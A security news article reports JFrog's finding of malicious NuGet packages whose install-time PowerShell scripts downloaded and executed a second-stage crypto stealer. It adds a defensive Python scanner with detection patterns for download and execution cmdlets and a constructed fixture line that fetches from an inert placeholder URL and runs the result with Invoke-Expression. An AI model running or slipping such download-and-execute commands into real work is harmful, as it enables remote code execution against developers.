Threat Actors Target .NET Developers with Malicious NuGet Packages
Recent reports have revealed that threat actors have started using the open source package manager NuGet to create malicious packages that target .NET developers. This discovery marks the first instance of malicious code found in NuGet packages in the wild, as stated by software package management company JFrog.
Shachar Menashe, senior director at JFrog Security Research, highlighted the significance of this discovery, stating, “For the first time, the NuGet repository – once thought to be untouched by malicious code – actually contains several harmful software packages designed to run automatically and often connected to further infected dependencies. This proves that no open source repository is safe from malicious actors.”
According to a recent advisory by JFrog security researchers Natan Nehorai and Brian Moussalli, these malicious packages have been downloaded over 150,000 times in the past month. The packages were found to contain a ‘download & execute’ type of payload, specifically a PowerShell script that triggers the download of a more sophisticated second-stage payload for remote execution.
The second-stage payload includes various capabilities such as a crypto stealer, an Electron archive extractor that supports code execution, and an auto-updater. After JFrog alerted NuGet administrators, the malicious packages were promptly removed from the repository.
Despite the removal of these malicious packages, .NET developers using NuGet are still at risk of encountering malicious code. Because packages of this kind execute code at installation time, simply adding a dependency can compromise a developer's environment. Menashe emphasized the importance of caution when selecting open-source components for software builds to maintain a secure software supply chain.
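As an added illustration, not code from the JFrog advisory or from this article, the check below treats a .nupkg as the zip archive it is, lists the tools/*.ps1 scripts that NuGet or Visual Studio may run automatically on install, and flags any that pair a download cmdlet with an execution cmdlet, which is the "download & execute" pattern described above. The sample package, its scripts and the placeholder URL are constructed fixtures.

```python
import io
import re
import zipfile

# A .nupkg is a zip archive. NuGet / Visual Studio may run these scripts
# automatically when a package is installed, so they are the first place to look.
INSTALL_SCRIPTS = ("tools/init.ps1", "tools/install.ps1", "tools/uninstall.ps1")

# Heuristic: a script that both fetches something from the network and executes it
# matches the "download & execute" stage described above.
DOWNLOAD = re.compile(r"Invoke-WebRequest|DownloadString|DownloadFile|Start-BitsTransfer", re.I)
EXECUTE = re.compile(r"Invoke-Expression|\biex\b|Start-Process|-EncodedCommand|\[Reflection\.Assembly\]::Load", re.I)

def scan_nupkg(data: bytes) -> dict:
    """Return install scripts found in the package and those that look like download-and-execute."""
    findings = {"install_scripts": [], "download_execute": []}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            path = name.replace("\\", "/").lower()
            if path in INSTALL_SCRIPTS or (path.startswith("tools/") and path.endswith(".ps1")):
                findings["install_scripts"].append(name)
                body = zf.read(name).decode("utf-8", errors="replace")
                if DOWNLOAD.search(body) and EXECUTE.search(body):
                    findings["download_execute"].append(name)
    return findings

def scan_file(path: str) -> dict:
    """Scan a .nupkg on disk, e.g. one pulled from the local package cache."""
    with open(path, "rb") as f:
        return scan_nupkg(f.read())

def build_sample(script: str) -> bytes:
    """Constructed fixture: a minimal package carrying a tools/init.ps1 (not a real NuGet package)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Example.nuspec", "<package><metadata><id>Example</id></metadata></package>")
        zf.writestr("lib/netstandard2.0/Example.dll", b"")
        zf.writestr("tools/init.ps1", script)
    return buf.getvalue()

# Constructed scripts: the first mirrors the download-and-execute pattern (inert placeholder URL),
# the second is an ordinary init.ps1 that only prints a message.
SUSPICIOUS = "$s = (New-Object Net.WebClient).DownloadString('https://example.invalid/stage2'); Invoke-Expression $s"
BENIGN = "param($installPath, $toolsPath, $package, $project)\nWrite-Host 'Example installed'"

if __name__ == "__main__":
    for label, script in (("suspicious", SUSPICIOUS), ("benign", BENIGN)):
        print(label, scan_nupkg(build_sample(script)))
```

The heuristic is deliberately coarse: a hit means "read this script by hand before restoring the package", not a verdict, and a package with no tools scripts can still be malicious through the assemblies it ships.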
Securing Open Source Software
For guidance on securing open source software, OpenUK CEO Amanda Brock has published an analysis on the subject. .NET developers and other users of open-source repositories should remain vigilant and prioritize security measures throughout the software development lifecycle.
As the threat landscape continues to evolve, staying informed about potential risks and implementing robust security practices is crucial for safeguarding software projects and protecting sensitive data.